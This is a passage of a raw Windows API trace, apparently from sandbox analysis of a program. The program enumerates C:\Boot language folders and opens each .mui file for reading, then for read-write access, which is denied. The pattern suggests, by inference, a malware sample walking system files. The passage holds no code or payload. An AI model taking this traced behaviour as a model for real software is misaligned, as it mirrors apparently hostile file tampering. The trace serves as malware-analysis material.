(HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0083.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0083.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.810] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.810] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.810] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.810] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0083.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.810] AreFileApisANSI () returned 1 [0083.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\nl-NL\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\nl-NL\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.810] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.810] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0083.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0083.810] AreFileApisANSI () returned 1 [0083.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0083.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 30 [0083.810] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.811] GetFileType (hFile=0x340) returned 0x1 [0083.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.811] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.811] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.811] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.811] CloseHandle (hObject=0x340) returned 1 [0083.811] AreFileApisANSI () returned 1 [0083.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53718 [0083.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x53718, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 30 [0083.812] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.812] GetLastError () returned 0x5 [0083.812] GetLastError () returned 0x5 [0083.812] SetLastError (dwErrCode=0x5) [0083.812] GetLastError () returned 0x5 [0083.812] SetLastError (dwErrCode=0x5) [0083.812] GetLastError () returned 0x5 [0083.812] SetLastError (dwErrCode=0x5) [0083.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0083.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.812] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.812] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.812] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6407cf, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0083.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0083.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0083.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0083.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0083.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.813] AreFileApisANSI () returned 1 [0083.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\nl-NL\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\nl-NL\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0083.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0083.813] AreFileApisANSI () returned 1 [0083.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0083.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\nl-NL\\memtest.exe.mui") returned 30 [0083.814] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\memtest.exe.mui" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.814] GetFileType (hFile=0x340) returned 0x1 [0083.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.814] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.814] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.814] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.814] CloseHandle (hObject=0x340) returned 1 [0083.814] AreFileApisANSI () returned 1 [0083.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0083.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\nl-NL\\memtest.exe.mui") returned 30 [0083.815] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\memtest.exe.mui" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.815] GetLastError () returned 0x5 [0083.815] GetLastError () returned 0x5 [0083.815] SetLastError (dwErrCode=0x5) [0083.815] GetLastError () returned 0x5 [0083.815] SetLastError (dwErrCode=0x5) [0083.815] GetLastError () returned 0x5 [0083.815] SetLastError (dwErrCode=0x5) [0083.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0083.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0083.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.815] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.815] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.815] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x69308, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧놠")) returned 0 [0083.815] FindClose (in: hFindFile=0x782d0 | out: hFindFile=0x782d0) returned 1 [0083.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0083.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0083.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0083.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.816] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.816] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.816] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.816] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.816] AreFileApisANSI () returned 1 [0083.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\pl-PL", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\pl-PL", lpUsedDefaultChar=0x0) returned 14 [0083.816] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.816] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0083.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0083.816] AreFileApisANSI () returned 1 [0083.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0083.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\pl-PL") returned 14 [0083.817] CreateFileW (lpFileName="C:\\Boot\\pl-PL" (normalized: "c:\\boot\\pl-pl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.817] GetLastError () returned 0x5 [0083.817] GetLastError () returned 0x5 [0083.817] SetLastError (dwErrCode=0x5) [0083.817] GetLastError () returned 0x5 [0083.817] SetLastError (dwErrCode=0x5) [0083.817] GetLastError () returned 0x5 [0083.817] SetLastError (dwErrCode=0x5) [0083.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.817] AreFileApisANSI () returned 1 [0083.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88680 [0083.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88680, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\pl-PL") returned 14 [0083.817] CreateFileW (lpFileName="C:\\Boot\\pl-PL" (normalized: "c:\\boot\\pl-pl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.817] GetLastError () returned 0x5 [0083.817] GetLastError () returned 0x5 [0083.817] SetLastError (dwErrCode=0x5) [0083.817] GetLastError () returned 0x5 [0083.817] SetLastError (dwErrCode=0x5) [0083.817] GetLastError () returned 0x5 [0083.817] SetLastError (dwErrCode=0x5) [0083.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.818] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6678d6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0083.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.818] FindFirstFileExW (in: lpFileName="C:\\Boot\\pl-PL\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78110 [0083.818] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef65403a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.818] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0083.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46b38 [0083.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 